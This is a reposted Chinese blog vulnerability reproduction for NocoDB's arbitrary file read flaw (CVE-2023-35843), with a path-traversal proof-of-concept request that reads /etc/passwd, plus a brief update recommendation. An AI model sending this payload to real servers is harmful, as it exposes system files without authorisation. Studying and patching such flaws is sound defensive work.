【漏洞复现】NocoDB 任意文件读取漏洞（CVE-2023-35843）

admin

102620
文章

87
评论

2024年2月23日21:04:10评论20 views字数 465阅读1分33秒阅读模式

声明：请勿将文章内的相关技术用于非法目的，如有相关非法行为与文章作者和本公众号无关。请遵守《中华人民共和国网络安全法》。

0X01 简介

NocoDB是一个开源Airtable 替代品。将任何 MySql、PostgreSql、Sql Server、Sqlite 和MariaDb 转换为智能电子表格。

官网：

https://www.nocodb.com/

漏洞编号：

CVE-2023-35843

影响范围：

NocoDB <= 0.106.1

复现环境：

NocoDB 0.106.1

0X02 漏洞复现

POC：

GET /download/../../../../../etc/passwd HTTP/1.1Host: 192.168.245.135:8080If-Modified-Since: Sat, 14 Oct 2023 18:05:53 GMTIf-None-Match: W/"4ce1-18b2f5dbaf4"

登录页面

【漏洞复现】NocoDB 任意文件读取漏洞（CVE-2023-35843）

0X03 修复建议

更新至最新版！

0X04

原文始发于微信公众号（皓月的笔记本）：【漏洞复现】NocoDB 任意文件读取漏洞（CVE-2023-35843）

左青龙
微信扫一扫

右白虎
微信扫一扫

【漏洞复现】NocoDB 任意文件读取漏洞（CVE-2023-35843）

MajorDoMo 未授权RCE漏洞

QVD-2024-15263禅道项目管理系统身份认证绕过

某直辖市HW三甲医院公众号越权漏洞泄露8W+个人信息

禅道项目管理系统身份认证绕过

Pkpmbs建设工程质量监督系统FileUpOrDown.ashx存在文件上传漏洞

CVE-2024-24488

用友NC grouptemplet 任意文件上传漏洞

瑞友天翼虚拟化系统-SQL注入-ConsoleExternalApi

用友一波POC/EXP

禅道 zentaosid 身份认证绕过漏洞

发表评论

在线咨询

微信